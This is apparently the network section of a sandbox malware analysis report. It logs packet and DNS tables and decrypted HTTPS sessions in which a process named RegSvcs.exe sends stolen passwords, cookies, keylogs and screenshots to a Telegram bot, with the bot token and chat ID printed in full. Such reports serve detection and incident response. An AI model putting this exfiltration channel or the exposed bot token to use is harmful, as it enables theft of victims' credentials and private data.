Dec 6, 2024 05:54:32.378567934 CET	50032	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:32.378850937 CET	50032	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:32.378865004 CET	443	50032	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:33.753768921 CET	443	50032	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:33.753853083 CET	50032	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:33.757996082 CET	50032	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:33.758008003 CET	443	50032	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:33.758259058 CET	443	50032	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:33.762260914 CET	50032	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:33.807338953 CET	443	50032	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:34.114193916 CET	50032	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:34.114224911 CET	443	50032	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:34.114326000 CET	50032	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:34.114341021 CET	443	50032	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:34.114413977 CET	50032	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:34.114500046 CET	443	50032	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:34.376039982 CET	443	50032	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:34.426317930 CET	50032	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:35.057748079 CET	443	50032	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:35.060237885 CET	443	50032	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:35.060276985 CET	50032	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:35.063819885 CET	50032	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:35.063832045 CET	443	50032	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:35.063855886 CET	50032	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:35.067822933 CET	50032	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:36.812697887 CET	50033	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:36.812748909 CET	443	50033	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:36.812854052 CET	50033	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:36.813155890 CET	50033	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:36.813169956 CET	443	50033	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:37.512053967 CET	50033	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:37.559339046 CET	443	50033	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:37.559379101 CET	50034	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:37.559422970 CET	443	50034	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:37.559516907 CET	50034	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:37.560669899 CET	50034	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:37.560683966 CET	443	50034	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:38.174576998 CET	443	50033	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:38.174635887 CET	50033	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:38.924422026 CET	443	50034	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:38.924556017 CET	50034	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:38.926028013 CET	50034	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:38.926040888 CET	443	50034	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:38.926244020 CET	443	50034	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:38.931289911 CET	50034	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:38.971338034 CET	443	50034	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:39.285974979 CET	50034	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:39.286005974 CET	443	50034	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:39.286134958 CET	50034	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:39.286158085 CET	443	50034	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:39.286273003 CET	50034	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:39.286289930 CET	443	50034	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:39.547866106 CET	443	50034	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:39.598211050 CET	50034	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:40.223453045 CET	443	50034	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:40.223525047 CET	50034	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:40.224968910 CET	50034	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:40.225008965 CET	443	50034	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:40.225058079 CET	50034	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:53.516629934 CET	50035	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:53.516695023 CET	443	50035	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:53.516807079 CET	50035	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:53.517102003 CET	50035	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:53.517117977 CET	443	50035	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:54.897671938 CET	443	50035	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:54.897805929 CET	50035	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:54.942039013 CET	50035	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:54.942070961 CET	443	50035	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:54.942332983 CET	443	50035	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:54.943636894 CET	50035	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:54.987334967 CET	443	50035	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:55.304466963 CET	50035	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:55.304512978 CET	443	50035	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:55.304692030 CET	50035	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:55.304709911 CET	443	50035	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:55.304810047 CET	50035	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:55.304830074 CET	443	50035	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:55.520001888 CET	443	50035	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:55.567357063 CET	50035	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:56.221352100 CET	443	50035	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:56.221404076 CET	50035	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:56.222073078 CET	50035	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:56.222104073 CET	443	50035	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:56.222166061 CET	50035	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:59.282866001 CET	50036	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:59.282927036 CET	443	50036	149.154.167.220	192.168.2.4
Dec 6, 2024 05:54:59.283010006 CET	50036	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:59.283340931 CET	50036	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:54:59.283358097 CET	443	50036	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:00.649674892 CET	443	50036	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:00.649749041 CET	50036	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:55:00.651756048 CET	50036	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:55:00.651766062 CET	443	50036	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:00.652000904 CET	443	50036	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:00.653196096 CET	50036	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:55:00.695333958 CET	443	50036	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:01.272263050 CET	443	50036	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:01.411870956 CET	50036	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:55:02.121041059 CET	50036	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:55:02.121087074 CET	443	50036	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:02.123936892 CET	50036	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:55:02.123956919 CET	443	50036	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:02.124043941 CET	50036	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:55:02.124080896 CET	443	50036	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:02.200592995 CET	50037	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:55:02.200630903 CET	443	50037	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:02.200706005 CET	50037	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:55:02.203114986 CET	50037	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:55:02.203123093 CET	443	50037	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:03.052175045 CET	443	50036	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:03.052252054 CET	50036	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:55:03.052562952 CET	50036	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:55:03.052597046 CET	443	50036	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:03.052788019 CET	443	50036	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:03.052839994 CET	50036	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:55:03.052855968 CET	50036	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:55:03.604803085 CET	443	50037	149.154.167.220	192.168.2.4
Dec 6, 2024 05:55:03.604862928 CET	50037	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 05:50:56.089823961 CET	55656	53	192.168.2.4	1.1.1.1
Dec 6, 2024 05:50:56.227305889 CET	53	55656	1.1.1.1	192.168.2.4
Dec 6, 2024 05:50:58.455792904 CET	54375	53	192.168.2.4	1.1.1.1
Dec 6, 2024 05:50:58.592763901 CET	53	54375	1.1.1.1	192.168.2.4
Dec 6, 2024 05:52:39.065028906 CET	50829	53	192.168.2.4	1.1.1.1
Dec 6, 2024 05:52:39.202337027 CET	53	50829	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 6, 2024 05:50:56.089823961 CET	192.168.2.4	1.1.1.1	0x4a81	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 6, 2024 05:50:58.455792904 CET	192.168.2.4	1.1.1.1	0x7066	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 6, 2024 05:52:39.065028906 CET	192.168.2.4	1.1.1.1	0xf3f	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 6, 2024 05:50:56.227305889 CET	1.1.1.1	192.168.2.4	0x4a81	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Dec 6, 2024 05:50:56.227305889 CET	1.1.1.1	192.168.2.4	0x4a81	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Dec 6, 2024 05:50:56.227305889 CET	1.1.1.1	192.168.2.4	0x4a81	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Dec 6, 2024 05:50:58.592763901 CET	1.1.1.1	192.168.2.4	0x7066	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 6, 2024 05:52:39.202337027 CET	1.1.1.1	192.168.2.4	0xf3f	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.67.74.152	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:50:57 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-12-06 04:50:57 UTC	424	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 04:50:57 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8ed9a8775a712361-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1755&min_rtt=1744&rtt_var=676&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1593016&cwnd=238&unsent_bytes=0&cid=0990a86d90b74f06&ts=449&x=0"
2024-12-06 04:50:57 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 Data Ascii: 8.46.123.228

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:50:59 UTC	260	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd1587a9f4ac63 Host: api.telegram.org Content-Length: 968 Expect: 100-continue Connection: Keep-Alive
2024-12-06 04:51:00 UTC	968	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 35 38 37 61 39 66 34 61 63 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 35 38 37 61 39 66 34 61 63 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 30 35 2f 32 30 32 34 20 32 33 3a 35 30 3a 35 37 0a 55 73 65 72 Data Ascii: -----------------------------8dd1587a9f4ac63Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd1587a9f4ac63Content-Disposition: form-data; name="caption"New PW Recovered!Time: 12/05/2024 23:50:57User
2024-12-06 04:51:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:51:00 UTC	1141	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:51:00 GMT Content-Type: application/json Content-Length: 753 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170383,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460660,"document":{"file_name":"user-610930 2024-12-05 23-50-57.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAECmY9nUoK0P3nIjEfvs3QilNtNWLdETgAC3RQAAjoemVIL2yCK-dkiGjYE","file_unique_id":"AgAD3RQAAjoemVI","file_size":347},"caption":"New PW Recovered!\n\nTime: 12/05/2024 23:50:57\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.228","caption_entities":[{"offset":178,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:51:02 UTC	237	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd15a4f24f5ee0 Host: api.telegram.org Content-Length: 6683 Expect: 100-continue
2024-12-06 04:51:02 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 35 61 34 66 32 34 66 35 65 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 35 61 34 66 32 34 66 35 65 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 30 36 2f 32 30 32 34 20 30 33 3a 32 30 3a 33 34 0a 55 73 65 72 Data Ascii: -----------------------------8dd15a4f24f5ee0Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd15a4f24f5ee0Content-Disposition: form-data; name="caption"New CO Recovered!Time: 12/06/2024 03:20:34User
2024-12-06 04:51:02 UTC	5609	OUT	Data Raw: 68 c1 34 86 6d 64 54 9c 6d 64 3c 9d ee ac b2 6c 1b 47 4b 8c eb 3b dc 5f c6 37 27 c0 9a be 39 24 67 f1 65 df 1e 03 84 6c 49 ae 58 0a a4 31 3f a5 92 e9 51 e4 be 54 b8 48 df 5e 90 23 e6 49 e0 9a 52 27 96 07 32 41 80 2d 93 00 6a 93 b8 52 a9 58 24 e4 e7 f6 4f e4 b3 a0 42 b2 d8 6c 00 fc 4e c6 5c 16 c8 ec b5 ac 36 6b 31 20 01 79 a0 14 10 4a fb 27 8b 25 3c 91 84 27 55 63 16 84 ea 08 ae 3e 35 29 22 99 84 0d d5 2d 9b 0b 08 be 9f 2c 16 49 d4 d8 83 2b 01 6e 18 31 4b a2 ce a8 b2 ac 32 71 1a 0b 6a 36 75 65 1d c1 41 eb 98 99 98 a0 15 44 a5 07 09 00 29 0b fe 68 7c e5 3b f0 11 47 b8 d1 e9 51 91 c1 09 24 06 25 84 d4 97 83 ca b5 a3 19 a1 11 24 46 92 6d 38 2d c9 d9 f6 53 f3 7e 71 fa 88 e1 1a 18 b3 00 13 34 4a e9 ec 60 16 1f f6 23 96 4c 2a 52 ee 33 61 0b 4c 77 f8 2f 3c 97 c7 Data Ascii: h4mdTmd<lGK;_7'9$gelIX1?QTH^#IR'2A-jRX$OBlN\6k1 yJ'%<'Uc>5)"-,I+n1K2qj6ueAD)h\|;GQ$%$Fm8-S~q4J`#L*R3aLw/<
2024-12-06 04:51:02 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 35 61 34 66 32 34 66 35 65 65 30 2d 2d 0d 0a Data Ascii: -----------------------------8dd15a4f24f5ee0--
2024-12-06 04:51:02 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:51:03 UTC	1147	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:51:03 GMT Content-Type: application/json Content-Length: 759 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170384,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460663,"document":{"file_name":"user-610930 2024-12-06 03-20-34.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAECmZBnUoK3JHLHKJoGs_lHUHHU2LCSJAAC3hQAAjoemVJKAr5tCPDbqDYE","file_unique_id":"AgAD3hQAAjoemVI","file_size":6057},"caption":"New CO Recovered!\n\nTime: 12/06/2024 03:20:34\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.228","caption_entities":[{"offset":178,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49817	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:52:28 UTC	236	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd20d7ce7df7a9 Host: api.telegram.org Content-Length: 930 Expect: 100-continue
2024-12-06 04:52:28 UTC	930	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 64 37 63 65 37 64 66 37 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 64 37 63 65 37 64 66 37 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 4b 4c 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 32 30 2f 32 30 32 34 20 30 39 3a 32 32 3a 32 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd20d7ce7df7a9Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd20d7ce7df7a9Content-Disposition: form-data; name="caption"New KL Recovered!Time: 12/20/2024 09:22:20User
2024-12-06 04:52:28 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:52:29 UTC	1141	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:52:28 GMT Content-Type: application/json Content-Length: 753 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170393,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460748,"document":{"file_name":"user-610930 2024-12-20 09-22-21.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAECmZlnUoMM3a4w4ERIgZCrO5ZA8ArDPAAC5xQAAjoemVKV-j_3Gnq8jDYE","file_unique_id":"AgAD5xQAAjoemVI","file_size":309},"caption":"New KL Recovered!\n\nTime: 12/20/2024 09:22:20\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.228","caption_entities":[{"offset":178,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49818	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:52:28 UTC	238	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd20dd74936aab Host: api.telegram.org Content-Length: 66950 Expect: 100-continue
2024-12-06 04:52:28 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 64 64 37 34 39 33 36 61 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 64 64 37 34 39 33 36 61 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 32 30 2f 32 30 32 34 20 31 30 3a 30 32 3a 34 32 0a 55 73 65 72 Data Ascii: -----------------------------8dd20dd74936aabContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd20dd74936aabContent-Disposition: form-data; name="caption"New SC Recovered!Time: 12/20/2024 10:02:42User
2024-12-06 04:52:28 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
